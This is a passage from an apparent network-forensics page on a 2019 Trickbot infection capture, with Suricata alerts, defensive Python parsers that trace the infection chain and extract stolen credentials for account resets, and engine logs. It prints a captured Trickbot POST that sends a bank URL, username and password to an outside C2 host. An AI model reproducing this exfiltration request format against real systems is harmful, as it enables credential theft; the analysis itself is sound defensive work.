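01/30/2019-21:07:04.819752  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:46.268769  [**] [1:2830243:2] ETPRO TROJAN W32/Trickbot C2 (networkDll module) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.30.101:49259 -> 24.247.181.125:8082
01/30/2019-21:08:01.444668  [**] [1:2008276:15] ET USER_AGENTS Suspicious User-Agent (contains loader) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.30.101:49260 -> 107.173.104.203:80
"""

# One fast.log record:
#   <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: <cls>] [Priority: <n>] {<proto>} <src>:<port> -> <dst>:<port>
FAST_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"\[Classification:\s*(?P<cls>[^\]]*)\]\s+\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[A-Z]+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)


def parse_fast_log(text):
    """Return one dict per well-formed alert line; lines that do not match are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_RE.match(line)
        if not m:
            continue
        a = m.groupdict()
        a["ts"] = datetime.strptime(a["ts"], "%m/%d/%Y-%H:%M:%S.%f")
        for k in ("gid", "sid", "rev", "prio", "sport", "dport"):
            a[k] = int(a[k])
        alerts.append(a)
    return alerts


def peer_of(alert, victim=VICTIM):
    """(external_ip, external_port, direction) for an alert that involves the victim."""
    if alert["dst"] == victim:
        return alert["src"], alert["sport"], "inbound"
    if alert["src"] == victim:
        return alert["dst"], alert["dport"], "outbound"
    return None


def summarize_peers(alerts, victim=VICTIM):
    """Group alerts by external peer: ports, signatures, directions, time window, best priority."""
    peers = {}
    for a in sorted(alerts, key=lambda a: a["ts"]):
        p = peer_of(a, victim)
        if p is None:
            continue
        ip, port, direction = p
        s = peers.setdefault(ip, {"ports": set(), "sids": set(), "directions": set(),
                                  "first_seen": a["ts"], "last_seen": a["ts"],
                                  "top_priority": a["prio"]})
        s["ports"].add(port)
        s["sids"].add(a["sid"])
        s["directions"].add(direction)
        s["last_seen"] = a["ts"]
        s["top_priority"] = min(s["top_priority"], a["prio"])  # Suricata: 1 is most severe
    for s in peers.values():
        for k in ("ports", "sids", "directions"):
            s[k] = sorted(s[k])
    return peers


def infection_chain(alerts, victim=VICTIM):
    """External ip:port endpoints in the order the victim first touched them."""
    seen, chain = set(), []
    for a in sorted(alerts, key=lambda a: a["ts"]):
        p = peer_of(a, victim)
        if p is None:
            continue
        endpoint = "%s:%d" % (p[0], p[1])
        if endpoint not in seen:
            seen.add(endpoint)
            chain.append(endpoint)
    return chain


if __name__ == "__main__":
    alerts = parse_fast_log(SAMPLE_FAST_LOG)
    print("chain:", " -> ".join(infection_chain(alerts)))
    for ip, s in summarize_peers(alerts).items():
        print(ip, s["ports"], s["sids"], s["directions"], "prio", s["top_priority"])
```

Run against the sample, the chain reads: EXE download over plain HTTP from 37.59.247.21:80, then TLS to 190.14.158.193:449 and 92.38.135.151:447 (both with self-signed certificates, see the unified2 dump below), then plaintext POSTs to 24.247.181.125:8082, then a second EXE from 107.173.104.203:80. Note that the OpenSSL demo CA signature is classified "Not Suspicious Traffic" at priority 3; a purely priority-driven triage would drop it, yet a default OpenSSL subject on a non-standard port like 449 is one of the more telling events in this capture.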


unified2.alert.1548925237 - (63091 bytes) - download
[unified2 is a binary record format (alert header plus the triggering packet); the raw bytes do not render as text and are omitted here. The printable strings recoverable from the embedded packets in the portion shown are listed below.]

[X.509 certificate, DER, self-signed (issuer and subject identical). Attribute types are read from the standard OpenSSL subject order, since the attribute OIDs are not legible in this rendering:
  C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
  validity 180924152453Z to 190924152453Z (2018-09-24 15:24:53 UTC to 2019-09-24 15:24:53 UTC)
 This is the OpenSSL default subject and is consistent with the "ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)" alerts on 190.14.158.193:449 in the alert log above. It appears three times in the portion shown.]

[X.509 certificate, DER, self-signed (issuer and subject identical), same caveat on attribute types:
  C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com
  validity 190128085254Z to 200128085254Z (2019-01-28 08:52:54 UTC to 2020-01-28 08:52:54 UTC), i.e. issued two days before this capture
 Consistent with the "ETPRO POLICY Possibly Suspicious example.com SSL Cert" and "ABUSE.CH SSL Blacklist" alerts on 92.38.135.151:447 above. It appears three times in the portion shown.]

[Plaintext HTTP POST from the victim to 24.247.181.125 (Host header); the alert log above shows these POSTs on port 8082:]

POST /ser0130us/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 24.247.181.125
Connection: close
Content-Type: multipart/form-data; boundary=---------OHYKDVMHWSHIPZQK
Content-Length: 254

-----------OHYKDVMHWSHIPZQK
Content-Disposition: form-data; name="data"

https://www.crazybank.com/|frankie.bronson|P@ssw0rd$

-----------OHYKDVMHWSHIPZQK
Content-Disposition: form-data; name="source"

IE passwords
-----------OHYKDVMHWSHIPZQK--

[A second POST to the same server, with the path ending /83/ instead of /81/, is cut off by the file truncation:]

POST /ser0130us/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 2

This file has been truncated.
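The POST recovered from the unified2 dump above is the part of this capture an incident responder actually needs: it shows what left the host. As an added example (not code from this page or from any Suricata component), the script below takes a raw HTTP request, checks the declared Content-Length against the captured body so a truncated capture is reported rather than silently mis-parsed, splits the multipart/form-data body by its boundary, and pulls the pipe-separated URL|user|password record out of the "data" field. The sample request is rebuilt from the POST above with CRLF line endings and a Content-Length computed from the rebuilt body (the capture says 254). Reading the URI as group tag / client id / command number follows public Trickbot write-ups and is an assumption here; the alert log only attributes the traffic to the networkDll module.

```python
"""Extract the exfiltrated form fields from a Trickbot-style multipart POST.
Added example for this page, not code from the page or from Suricata."""
import re

# Sample request reconstructed from the POST shown in the unified2 dump above.
_BOUNDARY = "---------OHYKDVMHWSHIPZQK"
_BODY = (
    "--" + _BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="data"\r\n'
    "\r\n"
    "https://www.crazybank.com/|frankie.bronson|P@ssw0rd$\r\n"
    "\r\n"
    "--" + _BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="source"\r\n'
    "\r\n"
    "IE passwords\r\n"
    "--" + _BOUNDARY + "--\r\n"
).encode()
SAMPLE_REQUEST = "\r\n".join([
    "POST /ser0130us/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A/81/ HTTP/1.1",
    "Accept: */*",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Host: 24.247.181.125",
    "Connection: close",
    "Content-Type: multipart/form-data; boundary=" + _BOUNDARY,
    "Content-Length: %d" % len(_BODY),  # computed so the constructed sample is self-consistent
    "", "",
]).encode() + _BODY


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, uri, headers, body).
    Raises ValueError when the captured body is shorter than Content-Length declares."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("end of headers not found")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = int(headers.get("content-length", len(body)))
    if declared != len(body):
        raise ValueError("Content-Length %d but %d body bytes captured" % (declared, len(body)))
    return method, uri, headers, body


def parse_multipart(body, content_type):
    """Return {field name: raw bytes} for a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("not multipart/form-data")
    delim = b"--" + m.group(1).encode()
    fields = {}
    for seg in body.split(delim)[1:]:
        if seg.startswith(b"--"):
            break                        # closing delimiter: --boundary--
        if seg.startswith(b"\r\n"):
            seg = seg[2:]                # CRLF that follows the delimiter line
        part_head, _, content = seg.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):
            content = content[:-2]       # the CRLF before the next delimiter belongs to it
        n = re.search(r'name="([^"]*)"', part_head.decode("latin-1"))
        if n:
            fields[n.group(1)] = content
    return fields


def trickbot_uri(uri):
    """Split /<gtag>/<HOST>_<OSVER>.<32hex>/<command>/ into its pieces.
    Segment roles follow public Trickbot write-ups (an assumption, not from the alert log)."""
    parts = [p for p in uri.split("/") if p]
    if len(parts) != 3:
        return None
    gtag, client_id, command = parts
    host, _, suffix = client_id.partition("_")
    os_ver, _, client_hash = suffix.partition(".")
    return {"gtag": gtag, "host": host, "os": os_ver,
            "client_hash": client_hash, "command": command}


def extract_credentials(raw):
    """Return (source label, [(url, user, password), ...]) from a credential-upload POST."""
    _method, _uri, headers, body = parse_http_request(raw)
    fields = parse_multipart(body, headers.get("content-type", ""))
    source = fields.get("source", b"").decode("latin-1").strip()
    creds = []
    for line in fields.get("data", b"").decode("latin-1").splitlines():
        if line.count("|") == 2:         # one URL|user|password record per line
            creds.append(tuple(line.split("|")))
    return source, creds


if __name__ == "__main__":
    _, uri, _, _ = parse_http_request(SAMPLE_REQUEST)
    print(trickbot_uri(uri))
    print(extract_credentials(SAMPLE_REQUEST))
```

The "data" field keeps the trailing CRLF that the capture shows after the credential line; `extract_credentials` strips it by splitting on lines. In a real incident, the returned records are the list of accounts to reset, and the host and client hash from the URI tie every later POST from this machine to the same bot without depending on the source IP.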


suricata-report-2019-01-31-T-09-00-39-01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap.txt - (17821 bytes) - download
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/27c27f6013451b522f979b5a048809f156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap -vvv -k none
elapsedtime:21.176566
stderr:
stdout:
31/1/2019 -- 09:00:18 - <Info> - Configuration node 'rule-files' redefined.
31/1/2019 -- 09:00:18 - <Notice> - This is Suricata version 4.0.0 RELEASE
31/1/2019 -- 09:00:18 - <Info> - CPUs/cores online: 1
31/1/2019 -- 09:00:18 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33259 and 'request-body-inspect-window' set to 16755 after randomization.
31/1/2019 -- 09:00:18 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32176 and 'response-body-inspect-window' set to 15681 after randomization.
31/1/2019 -- 09:00:18 - <Config> - DNS request flood protection level: 500
31/1/2019 -- 09:00:18 - <Config> - DNS per flow memcap (state-memcap): 524288
31/1/2019 -- 09:00:18 - <Config> - DNS global memcap: 16777216
31/1/2019 -- 09:00:18 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
31/1/2019 -- 09:00:18 - <Config> - preallocated 1000 hosts of size 136
31/1/2019 -- 09:00:18 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
31/1/2019 -- 09:00:18 - <Config> - using magic-file /usr/share/file/magic
31/1/2019 -- 09:00:18 - <Config> - Core dump size is unlimited.
31/1/2019 -- 09:00:18 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
31/1/2019 -- 09:00:18 - <Config> - preallocated 1000 defrag trackers of size 168
31/1/2019 -- 09:00:18 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
31/1/2019 -- 09:00:18 - <Config> - stream "prealloc-sessions": 2048 (per thread)
31/1/2019 -- 09:00:18 - <Config> - stream "memcap": 33554432
31/1/2019 -- 09:00:18 - <Config> - stream "midstream" session pickups: disabled
31/1/2019 -- 09:00:18 - <Config> - stream "async-oneside": disabled
31/1/2019 -- 09:00:18 - <Config> - stream "checksum-validation": disabled
31/1/2019 -- 09:00:18 - <Config> - stream."inline": disabled
31/1/2019 -- 09:00:18 - <Config> - stream "bypass": disabled
31/1/2019 -- 09:00:18 - <Config> - stream "max-synack-queued": 5
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "memcap": 134217728
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "depth": 0
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "toserver-chunk-size": 2625
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "toclient-chunk-size": 2496
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly.raw: enabled
31/1/2019 -- 09:00:18 - <Config> - stream.reassembly "segment-prealloc": 2048
31/1/2019 -- 09:00:18 - <Config> - Delayed detect disabled
31/1/2019 -- 09:00:18 - <Config> - pattern matchers: MPM: ac, SPM: bm
31/1/2019 -- 09:00:18 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
31/1/2019 -- 09:00:18 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
31/1/2019 -- 09:00:18 - <Config> - prefilter engines: MPM
31/1/2019 -- 09:00:18 - <Config> - IP reputation disabled
31/1/2019 -- 09:00:18 - <Perf> - Registered 148 keyword profiling counters.
31/1/2019 -- 09:00:18 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
31/1/2019 -- 09:00:18 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
31/1/2019 -- 09:00:18 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
31/1/2019 -- 09:00:22 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
31/1/2019 -- 09:00:23 - <Config> - No rules loaded from ET-icmp.rules.
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
31/1/2019 -- 09:00:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
31/1/2019 -- 09:00:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
31/1/2019 -- 09:00:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
31/1/2019 -- 09:00:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
31/1/2019 -- 09:00:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
31/1/2019 -- 09:00:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
31/1/2019 -- 09:00:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
31/1/2019 -- 09:00:30 - <Config> - No rules loaded from local.rules.
31/1/2019 -- 09:00:30 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
31/1/2019 -- 09:00:30 - <Info> - Threshold config parsed: 0 rule(s) found
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tcp-packet
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tcp-stream
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for udp-packet
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for other-ip
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_uri
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_client_body
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_accept
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_accept_enc
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_accept_lang
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_referer
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_connection
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_method
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_uri
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_user_agent
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_host
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_raw_host
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_stat_msg
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_stat_code
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for dns_query
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_sni
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_cert_issuer
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_cert_subject
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for tls_cert_serial
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 09:00:31 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 09:00:31 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
31/1/2019 -- 09:00:31 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
31/1/2019 -- 09:00:31 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
31/1/2019 -- 09:00:31 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
31/1/2019 -- 09:00:31 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
31/1/2019 -- 09:00:31 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
31/1/2019 -- 09:00:31 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
31/1/2019 -- 09:00:31 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
31/1/2019 -- 09:00:35 - <Perf> - Unique rule groups: 104
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toserver TCP packet": 35
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toclient TCP packet": 17
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toserver TCP stream": 33
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toclient TCP stream": 19
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toserver UDP packet": 27
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "toclient UDP packet": 17
31/1/2019 -- 09:00:35 - <Perf> - Builtin MPM "other IP packet": 3
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_uri": 14
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_request_line": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_client_body": 6
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_response_line": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_header": 10
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_header": 6
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_header_names": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_accept": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_referer": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_content_len": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_content_type": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_content_type": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_protocol": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_start": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_method": 5
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_cookie": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_cookie": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver http_host": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver dns_query": 4
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver tls_sni": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toserver file_data": 1
31/1/2019 -- 09:00:35 - <Perf> - AppLayer MPM "toclient file_data": 7
31/1/2019 -- 09:00:37 - <Perf> - Registered 39590 rule profiling counters.
31/1/2019 -- 09:00:37 - <Info> - fast output device (regular) initialized: alert
31/1/2019 -- 09:00:37 - <Info> - eve-log output device (regular) initialized: eve.json
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'alert'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'http'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'dns'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'tls'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'files'
31/1/2019 -- 09:00:37 - <Config> - enabling 'eve-log' module 'ssh'
31/1/2019 -- 09:00:37 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
31/1/2019 -- 09:00:37 - <Info> - stats output device (regular) initialized: stats.log
31/1/2019 -- 09:00:37 - <Config> - AutoFP mode using "Hash" flow load balancer
31/1/2019 -- 09:00:37 - <Info> - reading pcap file /var/pcap/01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap
31/1/2019 -- 09:00:37 - <Config> - 

This file has been truncated.


stats.log - (2996 bytes)
------------------------------------------------------------------------------------
Date: 1/31/2019 -- 09:00:39 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 7081
decoder.bytes                              | Total                     | 6764059
decoder.ipv4                               | Total                     | 7081
decoder.ethernet                           | Total                     | 7081
decoder.tcp                                | Total                     | 7067
decoder.udp                                | Total                     | 14
decoder.avg_pkt_size                       | Total                     | 955
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 17
flow.udp                                   | Total                     | 7
tcp.sessions                               | Total                     | 17
tcp.syn                                    | Total                     | 18
tcp.synack                                 | Total                     | 15
tcp.rst                                    | Total                     | 5
detect.alert                               | Total                     | 24
detect.nonmpm_list                         | Total                     | 1
app_layer.flow.http                        | Total                     | 7
app_layer.tx.http                          | Total                     | 7
app_layer.flow.tls                         | Total                     | 8
app_layer.flow.dns_udp                     | Total                     | 7
